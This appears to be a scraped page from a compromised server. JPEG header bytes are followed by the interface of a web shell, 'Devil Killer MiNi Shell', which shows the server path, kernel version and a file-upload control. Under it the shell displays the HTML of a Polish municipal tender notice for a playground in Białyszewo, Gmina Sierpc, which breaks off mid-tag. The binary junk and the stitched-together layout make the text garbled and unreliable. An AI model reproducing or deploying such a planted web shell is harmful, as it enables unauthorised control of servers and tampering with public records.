JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240626/0038384201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa infrastruktury rekreacyjnej na działce o nr ewid. 60 obręb Białyszewo, gmina Sierpc </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 275 57 01</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 275 57 01 w. 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa infrastruktury rekreacyjnej na działce o nr ewid. 60 obręb Białyszewo, gmina Sierpc </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-efc59455-06cd-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00383842</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00051758/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa infrastruktury rekreacyjnej na działce o nr ewid. 60 obręb ewid. Białyszewo, gmina Sierpc</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich, w ramach poddziałania 19.2. &#34;Wsparcie na wdrażanie operacji w ramach strategii rozwoju lokalnego kierowanego przez społeczność&#34; objętego Programem Rozwoju Obszarów Wiejskich na lata 2014-2020, wdrażanej przez Stowarzyszenie Lokalna Grupa Działania &#34;Sierpeckie Partnerstwo&#34;. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-efc59455-06cd-11ef-bfd2-32fa350b5bfc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio <br/> do widoku postępowania na Platformie e-Zamówienia:<br/> https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-efc59455-06cd-11ef-bfd2-<br/> 32fa350b5bfc<br/>2. Sposób komunikowania się za pośrednictwem Platformy e-Zamówienia został opisany pod <br/> adresem: https://ezamowienia.gov.pl<br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy <br/> i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza <br/> komunikację za pomocą (nie dotyczy składania ofert):<br/> - Elektronicznej Skrzynki Podawczej ePUAPu Urzędu Gminy w Sierpcu pod adresem:<br/> /3f4ih06ymt/SkrytkaESP<br/> - poczty elektronicznej na adres e-mail: architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania <br/> konta na Platformie e-Zamówienia ani logowania.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/> publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/> Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania <br/> z Platformy e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie <br/> internetowej https://ezamowienia.gov.pl oraz zamieszczone w zakładce „Centrum pomocy”.<br/>3. Komunikacja w postępowaniu, przy użyciu platformy e-Zamówienia, z wyłączeniem składania <br/> ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych <br/> w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy <br/> do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie <br/> pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie <br/> załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>4. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady <br/> Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym <br/> podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, <br/> zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie <br/> zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub <br/> wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) <br/> dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ <br/> zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie <br/> wymaga posiadania konta „Wykonawca” na Platformie e-Zamówienia oraz zalogowania się <br/> na Platformie e – Zamówienia. Do korzystania z „Formularzy do komunikacji” służących <br/> do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności <br/> SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są <br/> po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” <br/> wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego <br/> formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług <br/> Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin <br/> Platformy e-Zamówienia.<br/>9. Za datę przekazania oferty, oświadczeń, podmiotowych środków dowodowych, przedmiotowych <br/> środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych <br/> w postępowaniu, przyjmuje się datę ich przekazania na Platformę e-Zamówienia.<br/>10. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy <br/> e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod <br/> numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony <br/> na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>11. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących <br/> kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być <br/> zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów <br/> w sprawie wymagań dla dokumentów elektronicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Sierpcu jest <br/> Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/>2. administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie <br/> podstawowym na roboty budowlane pn. „Budowa infrastruktury rekreacyjnej na działce<br/> o nr ewid. 60 obręb ewid. Białyszewo, gmina Sierpc”.<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od <br/> dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza <br/> 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących <br/> jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem <br/> w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych <br/> danych wynikają z ustawy pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>8. posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania<br/> o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 <br/> ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/> gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/> RODO; <br/>9. nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia <br/> danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 <br/> RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/> osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 <br/> lit. c RODO;<br/>10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO <br/> przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla <br/> przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>11. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, <br/> do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO<br/> i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. <br/> Do obowiązków tych należą:<br/>11.1. obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane <br/> osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał <br/> zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego,<br/>11.2. obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane <br/> wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu <br/> w treści oferty lub dokumentów składanych na żądanie zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nazwa nadana zamówieniu przez Zamawiającego:<br/>„Budowa infrastruktury rekreacyjnej na działce o nr ewid. 60<br/> obręb ewid. Białyszewo, gmina Sierpc”.<br/><br/>2. OPIS PRZEDMIOTU ZAMÓWIENIA:<br/>2.1. Przedmiot zamówienia, zgodnie z art. 103 ust. 1 ustawy Pzp, został opisany za pomocą <br/> Opracowania Technicznego do zgłoszenia robót oraz Szczegółowej Specyfikacji Technicznej <br/> Wykonania i Odbioru Robót (SST) /załączniki nr 11-12 do SWZ/.<br/><br/>2.2. Zamierzenie budowlane obejmuje budowę placu rekreacyjnego wraz z infrastrukturą towarzyszącą <br/> na działce o nr ew.60, obręb Białyszewo, gmina Sierpc. Roboty będą polegały na dostawie <br/> i montażu urządzeń placu zabaw i siłowni zewnętrznej oraz lamp solarnych i urządzeń małej <br/> architektury w miejscu istniejącego ogrodzonego placu zabaw. <br/> <br/>2.3. Przewiduje się wykonanie następujących robót:<br/>2.3.1. Dostawa i montaż urządzeń placu zabaw:<br/>•	hamak sprawnościowy - ilość szt. 1,<br/>•	zestaw Kosmo - ilość szt. 1,<br/>•	zestaw street Kids - ilość szt. 1,<br/>•	regulamin - ilość szt.1,<br/>•	karuzela platforma fi 1500 H4 - ilość szt. 1,<br/>•	huśtawka łańcuchowa puls swing - ilość szt.1,<br/>•	zestaw zabawowy nr 2 - ilość szt.1,<br/>•	bujak pieski ważka - ilość szt. 1,<br/>•	huśtawka wagowa metalowa - ilość szt. 1,<br/>•	lampa solarna typ parkowy - ilość szt. 3,<br/>•	ławka solarna - ilość szt. 1,<br/>•	kosz na śmieci do segregacji - ilość szt. 1,<br/>•	kosz na śmieci - ilość szt. 3,<br/>•	ławki - ilość szt. 4.<br/>2.3.2. Dostawa i montaż urządzeń siłowni zewnętrznej:<br/>•	urządzeni jeździec/Narciarz - ilość szt.1,<br/>•	urządzenie Orbitrek - ilość szt. 1,<br/>•	urządzenie wyciąg i rower - ilość szt. 1,<br/>•	regulamin - ilość szt. 1.<br/>2.3.3. Roboty zmienne:<br/>•	Przesianie istniejącego piasku nawierzchni montażu urządzeń placu zabaw i ewentualne jego uzupełnienie do wymaganej grubości dla nawierzchni bezpiecznej tj. minimum 30 cm po wybudowaniu urządzeń.<br/>2.3.4. Zabezpieczenie terenu robót i roboty towarzyszące.<br/><br/>3. Postanowienia ogólne dotyczące przedmiotu zamówienia:<br/>3.1. Szczegółowy zakres przedmiotu zamówienia zawarty jest w załącznikach do SWZ tj. określony jest <br/> w opracowaniu technicznym do zgłoszenia robót, przedmiarze robót oraz w Szczegółowej <br/> Specyfikacji Technicznej Wykonania i Odbioru Robót (SST). Przedmiar robót ma charakter <br/> jedynie informacyjny i jest wyłącznie pomocniczy przy wycenie oferty. Obowiązuje <br/> opracowanie techniczne i SST.<br/>3.2. Wymaga się, aby Wykonawca zdobył wszelkie informacje o przedmiocie zamówienia co do ryzyka, <br/> trudności i wszelkich innych okoliczności, które mogą być konieczne do przygotowania oferty oraz <br/> podpisania umowy.<br/>3.3. Niniejsza Specyfikacja Warunków Zamówienia opisuje przedmiot zamówienia w sposób <br/> wyczerpujący i kompletny. Jednakże w celu lepszego zapoznania się z przedmiotem zamówienia,<br/> sprawdzenia warunków terenu budowy, warunków związanych z wykonaniem prac będących<br/> przedmiotem zamówienia oraz celem uzyskania informacji przydatnych do przygotowania oferty <br/> Zamawiający zaleca dokonanie przez wykonawcę wizji lokalnej w terenie. Koszt ewentualnej wizji <br/> lokalnej poniesie Wykonawca. Zamawiający informuje jednocześnie, iż zalecana wizja lokalna <br/> nie stanowi wiążącego elementu SWZ w rozumieniu art. 131 ust. 2 ustawy Pzp.<br/>3.4. Roboty ujęte w opracowaniu technicznym oraz przedmiarze robót, a nie ujęte w wycenie oferty, <br/> nie będą traktowane jako roboty dodatkowe i nie będą dodatkowo finansowane przez <br/> Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">37535100-8 - Huśtawki</p> <p class="mb-0">37535220-5 - Urządzenia do wspinania</p> <p class="mb-0">37535240-1 - Zjeżdżalnie do placów zabaw</p> <p class="mb-0">37410000-5 - Sprzęt sportowy do uprawiania sportów na wolnym powietrzu</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami oceny ofert:<br/>1) „Cena” (C) – waga kryterium 60 %;<br/>2) „Okres gwarancji i rękojmi” (GR) – waga kryterium 40 %<br/><br/>2. Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu <br/> zamówienia, podanej przez Wykonawcę w formularzu oferty. <br/><br/> Zamawiający przyzna punkty wg następującego wzoru:<br/><br/> Cena najniższa brutto*<br/>C = ------------------------------------- x 100 pkt x 60%<br/> Cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>3. Kryterium - „Okres gwarancji i rękojmi” będzie rozpatrywane na podstawie okresu gwarancji <br/> jakości i rękojmi na roboty objęte przedmiotem zamówienia, podanej przez Wykonawcę <br/> w formularzu oferty, punktowany będzie wg. poniższego schematu na podstawie wskazanego <br/> terminu w formularzu oferty:<br/><br/> GR o – GR min<br/>GR = ------------------ x 100 pkt x 40%<br/> GR max – GR min<br/>Gdzie:<br/>GR max – gwarancja i rękojmia maksymalna (60 m-cy),<br/>GR min – gwarancja i rękojmia minimalna (36 m-cy),<br/>GR o – gwarancja i rękojmia oferty ocenianej (w miesiącach).<br/>Termin gwarancji i rękojmi należy proponować w pełnych miesiącach.<br/>UWAGA: Maksymalna liczba 40 punktów zostanie przyznana za udzielenie 60 m-cy lub <br/> dłuższej gwarancji i rękojmi na wykonany przedmiot zamówienia. W przypadku <br/> zaoferowania gwarancji i rękojmi dłuższej niż 60 m-cy, do oceny kryterium będzie brany <br/> okres gwarancji i rękojmi maksymalny.<br/><br/>Minimalny okres gwarancji jakości rękojmi dla robót budowlanych – 36 m-cy. Zaoferowanie krótszego okresu gwarancji spowoduje odrzucenie oferty. Jeżeli Wykonawca nie wypełni zobowiązania dotyczącego okresu gwarancji i rękojmi, Zamawiający uzna, że okres gwarancji i rękojmi został udzielony na 36 miesięcy. Każdy kolejny miesiąc nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę <br/> punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, <br/> obliczonych wg wzoru:<br/>P = C + GR<br/>gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Okres Gwarancji i Rękojmi”<br/>P – łączna liczba punktów przyznana ofercie ocenianej<br/><br/>5. Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 